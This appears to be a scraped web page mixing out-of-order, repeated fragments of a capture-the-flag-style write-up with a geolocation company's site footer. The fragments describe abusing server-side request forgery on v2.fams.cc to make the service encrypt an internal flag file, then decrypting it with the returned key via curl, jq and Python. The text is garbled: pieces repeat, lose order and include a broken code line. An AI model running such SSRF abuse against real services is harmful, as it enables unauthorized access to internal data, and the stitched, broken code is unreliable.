# Remove PKCS#7 padding pad_len = pt[-1] flag = pt[:-pad_len].decode() print(flag) Running it yields:

# 1️⃣ Ask the service to encrypt the internal flag file RESP=$(curl -s -X POST "$TARGET/encrypt" \ -d "url=$SSRF_URL&key=$KEY") DOWNLOAD=$(echo "$RESP" | jq -r .download) USED_KEY=$(echo "$RESP" | jq -r .used_key)

By abusing the SSRF to read the internal flag file, then using the deterministic encryption routine to decrypt it (the service returns the ciphertext and the key it used), we can recover the flag. 2.1. Basic browsing $ curl -s http://v2.fams.cc Result – a tiny HTML page:

iv_ct = open('/tmp/enc.bin','rb').read() iv, ct = iv_ct[:16], iv_ct[16:]

"download": "http://v2.fams.cc/download/7a9c3d", "used_key": "8c3c5d1e2f4a6b7c9d0e1f2a3b4c5d6e"

V2.fams.cc Instant

# Remove PKCS#7 padding pad_len = pt[-1] flag = pt[:-pad_len].decode() print(flag) Running it yields:

# 1️⃣ Ask the service to encrypt the internal flag file RESP=$(curl -s -X POST "$TARGET/encrypt" \ -d "url=$SSRF_URL&key=$KEY") DOWNLOAD=$(echo "$RESP" | jq -r .download) USED_KEY=$(echo "$RESP" | jq -r .used_key) v2.fams.cc

By abusing the SSRF to read the internal flag file, then using the deterministic encryption routine to decrypt it (the service returns the ciphertext and the key it used), we can recover the flag. 2.1. Basic browsing $ curl -s http://v2.fams.cc Result – a tiny HTML page: # Remove PKCS#7 padding pad_len = pt[-1] flag

iv_ct = open('/tmp/enc.bin','rb').read() iv, ct = iv_ct[:16], iv_ct[16:] ct = iv_ct[:16]

"download": "http://v2.fams.cc/download/7a9c3d", "used_key": "8c3c5d1e2f4a6b7c9d0e1f2a3b4c5d6e"

Learn more about how geo targeting can increase your conversions & audience engagement

Resources

Documentation Guides Case Studies Our Blog My IP Geolocation System Status Roadmap

Products

Geo Redirect Geo Links Geo Content Geo Popups Geo Bars Geo Image Geo Block Geo Exit-Intent Geo URL Shortener Geo Location Geo JavaScript Geo Currency Geo Consent Geo Translate Geo Page

Legal & Security

SaaS Agreement Website Terms of Use Privacy Policy Cookies GDPR Data Processing Security

Useful

Geo Redirects & SEO About IP geolocation Hreflang SEO Guide HTML5 Geolocation E-commerce multi-regional stores Community FAQs Affiliate Program

Free Tools

Geo Browse My IP Geolocation Hreflang Generator Free Country Flags IP Lookup

Connect

Contact Support Submit Feedback Request Demo

Obchodná 2
811 06 Bratislava
Slovakia

Copyright © 2025
TechTurtle, s.r.o.